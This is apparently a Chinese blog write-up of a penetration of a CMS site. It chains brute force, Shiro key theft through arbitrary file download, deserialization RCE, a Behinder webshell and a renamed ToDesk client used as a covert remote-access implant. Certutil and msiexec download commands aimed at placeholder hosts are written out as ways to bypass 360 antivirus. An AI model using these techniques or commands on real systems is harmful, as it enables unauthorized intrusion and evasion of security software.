記一次曲折的Getshell過程

信息收集

訪問目標站點，找到其后臺登錄頁面,對源碼進行分析，確定是某cms

對網站進行分析，在數據包中發現_rememberMe等字段，驚喜！驚喜！驚喜！幸運女神我愛你——存在shiro框架。

雖然有了shiro但是不能驕傲，再去找找其他的洞，畢竟，洞這東西得靠自己找才行。

然后 順利的又找到了一個任意文件下載的漏洞。接下來先利用目前已有的信息進行滲透 ！

網站滲透

暴力破解

查看數據包發現，賬戶密碼未進行加密處理且連續發包驗證碼可重復利用，直接開爆

爆破這塊不再過多贅述，在爆破這段時間再去利用一下shiro框架漏洞

shiro反序列化

嘗試shiro組件漏洞，一頓操作 發現沒有爆出來key，擺爛中。。。。

究其原因就是：新版本Shiro(>=1.4.2)采?了AES-GCM加密?式，Shiro高版本下的漏洞利用，就需要考慮加密模式變化的情況。

舊版?具的加密算法?法正常利?漏洞 如果知道硬編碼的情況下可以使??具

知道了解決方法，那就繼續擺爛......

擺爛擺爛，既然shiro這條路走不通，那就換條路走吧 古人還云：條條大路還通羅馬呢！（幸運女神-拜拜！）

在放棄的邊緣想起，不是還找到了任意文件下載漏洞嘛，這是腦子！自己找的洞都忘了！于是利用任意文件下載漏洞將存儲key值的文件下載出來！

于是乎找到源碼，網上查找存儲shiro框架key的地方。

WEB-INF\classes\application.yml

利用任意下載將其下下來拿到朝思暮想的key

命令執? shiro?般使? CommonsBeanutils1 這?依賴鏈?

將找到的key輕輕的放入對應的位置

見證奇跡的時刻！！！

哦~哦~這就很美麗！

心里想著 有key了，有構造鏈了，接下來之路豈不是一馬平川，萬馬奔騰，“我要策馬奔騰向你懷中，解開思念的謎千年的夢......”一首老歌瞬間在耳中響起。接下來繼續操作

執行命令發現是system權限 ，這就很nice！

但是在執行幾條命令后 發現 有些敏感命令執行不了 ，于是乎查看了一下進程情況，哦 一首涼涼送給我：“涼涼夜色為你思念成河，化作春泥呵護著我”——360全家桶。

執??些危險命令360主動防御會?動攔截?且沒有什么好的?法進?繞過。以前使?這些語句可以繞過下載攔截 。

Certutil & Certutil –urlcache –f –split http://xxx.xxx.xxx.xxx/python3.exe
Certutil | Certutil –urlcache –f –split http://xxx.xxx.xxx.xxx/python3.exe
certutil|certutil -urlcache split -f http://xxx.com/dns.exe
copy c:\windows\system32\certutil.exe c.exec -urlcache -split -f http://xxx.com/dns.exe
msiexec /q /i http://xxx.xxx.xxx.xxx/cmd.png

如果這些都繞不過 直接在?站上傳?件就可以了。沒必要與主動防御較勁。

弱口令

能用的洞也用完了 ， 爆破也結束了 ，該說不說 ，上天給你關上一扇門必會給你打開一扇窗（一個小洞也行）。很成功的爆破出來了賬戶密碼，弱口令牛逼！！！

查看該cms歷史漏洞，發現存在一處上傳文件地方

此時想著:“能進入后臺直接在?站上傳?件就可以了,沒必要與主動防御較勁,難道非要撞了南墻才回頭嘛。”

后臺模塊管理處 存在?解壓

上傳冰蝎的jsp馬子 進行連接，成功連接！！！

利用todesk企業版制作免殺工具

1，注冊todesk企業版

2，下載控制端安裝登錄

3，在網頁個人中心里面，找到設備碼，就是安裝碼，也叫部署碼。記住這個，上線要用到。

4，下載客戶端，被控端，找個虛擬機，安裝。

5，將安裝好的的文件中ToDesk_Host_Service.EXE和ToDesk_HosT.exe兩個文件拖出來把ToDesk_HosT.exe 修改文件名，改成 ToDesk_.exe并打包

然后這兩個文件打包好，上傳到目標主機。

6，然后補充路徑，直接運行

利用設置好的連接碼進行連接上線。

連接上之后上去關掉360，進行內網滲透。

結語：

回顧整個滲透過程，處處充滿驚喜但又處處充滿意外，整個過程的心情就像是過山車，刺激！！！